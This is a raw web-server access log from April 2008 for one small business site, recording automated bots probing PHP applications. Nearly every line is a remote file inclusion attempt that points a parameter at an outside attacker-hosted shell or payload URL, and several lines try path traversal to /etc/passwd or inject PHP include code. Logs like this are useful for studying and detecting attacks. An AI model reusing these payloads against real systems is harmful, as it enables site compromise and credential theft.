193.189.74.29 - - [01/Apr/2008:04:21:34 -0700] "GET /services.php?page=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:04:21:34 -0700] "GET /logs/services.php?page=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:04:22:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:04:22:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:04:22:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
204.15.133.133 - - [01/Apr/2008:04:24:35 -0700] "GET /order/login.php?svr_rootscript=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.bsfadvisors.com"
204.15.133.133 - - [01/Apr/2008:04:24:35 -0700] "GET /logs/order/login.php?svr_rootscript=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:04:24:59 -0700] "GET /logs/access_080101.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:04:25:05 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:04:25:05 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:04:25:10 -0700] "GET /logs/access_080101.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
66.225.192.202 - - [01/Apr/2008:04:26:40 -0700] "GET /logs/index.php?body=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.225.192.202 - - [01/Apr/2008:04:26:40 -0700] "GET /index.php?body=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.15.133.133 - - [01/Apr/2008:04:28:15 -0700] "GET /logs/index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.bsfadvisors.com"
204.15.133.133 - - [01/Apr/2008:04:28:15 -0700] "GET /index.php?body=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.bsfadvisors.com"
205.234.213.67 - - [01/Apr/2008:04:28:40 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [01/Apr/2008:04:28:40 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:04:29:52 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
70.85.201.66 - - [01/Apr/2008:04:29:52 -0700] "GET /logs/index.php?body=http://www.soscontacto.com.mx/rateme_v1.3.2/images/2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.85.201.66 - - [01/Apr/2008:04:29:53 -0700] "GET /index.php?body=http://www.soscontacto.com.mx/rateme_v1.3.2/images/2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.19.151.104 - - [01/Apr/2008:04:29:54 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
81.19.151.104 - - [01/Apr/2008:04:29:54 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:04:31:29 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:04:31:29 -0700] "GET /logs//hpmaker/index.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:04:31:29 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:04:31:30 -0700] "GET //hpmaker/index.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:04:32:42 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:04:33:12 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:04:33:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:04:33:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:04:33:28 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
74.6.22.91 - - [01/Apr/2008:04:33:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.22.251 - - [01/Apr/2008:04:33:46 -0700] "GET /?S=A HTTP/1.0" 200 1164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:04:34:51 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:04:35:13 -0700] "GET //login.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
124.51.67.46 - - [01/Apr/2008:04:36:39 -0700] "GET //ask_password.php?dir=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
124.51.67.46 - - [01/Apr/2008:04:36:44 -0700] "GET /logs//ask_password.php?dir=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:04:39:04 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:04:39:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:04:39:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:40:06 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:40:07 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
66.225.192.202 - - [01/Apr/2008:04:41:05 -0700] "GET /logs/index.php?body=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.225.192.202 - - [01/Apr/2008:04:41:05 -0700] "GET /index.php?body=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:04:41:16 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:04:41:16 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:04:41:16 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:04:43:10 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:04:43:10 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:04:44:11 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:04:45:09 -0700] "GET /logs/access_080101.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:04:45:09 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:04:45:10 -0700] "GET /logs/access_071231.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:04:46:42 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:04:47:21 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:04:48:41 -0700] "GET /logs/access_080101.log//include.php?path[docroot]=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:50:36 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:50:36 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
92.48.75.104 - - [01/Apr/2008:04:53:15 -0700] "GET /logs//login.php?dir=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
92.48.75.104 - - [01/Apr/2008:04:53:16 -0700] "GET //login.php?dir=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:04:55:10 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:04:55:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:04:56:11 -0700] "GET /logs//login.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:04:56:11 -0700] "GET //login.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:04:57:23 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:04:59:30 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:04:59:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:04:59:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:59:51 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.249.108 - - [01/Apr/2008:04:59:51 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://mildnet.by.ru/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:05:00:57 -0700] "GET /?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 1180 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:05:00:57 -0700] "GET /logs/?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.201.241.88 - - [01/Apr/2008:05:04:12 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [01/Apr/2008:05:04:13 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
208.201.241.88 - - [01/Apr/2008:05:04:13 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:07:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:07:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:05:07:51 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:08:45 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:08:45 -0700] "GET //config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:08:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:09:00 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:09:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:09:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:09:50 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:09:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:09:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:10:49 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:10:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:10:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:10:53 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:10:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:10:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:05:12:16 -0700] "GET /logs/access.log/%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:05:12:17 -0700] "GET /%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:05:12:17 -0700] "GET /logs/%02/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://contactcraze.com/t.txt????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:14:04 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:14:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:14:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:14:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:14:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:16:03 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:16:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:16:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:18:25 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:18:25 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:05:18:25 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:19:13 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:19:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:19:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:19:16 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
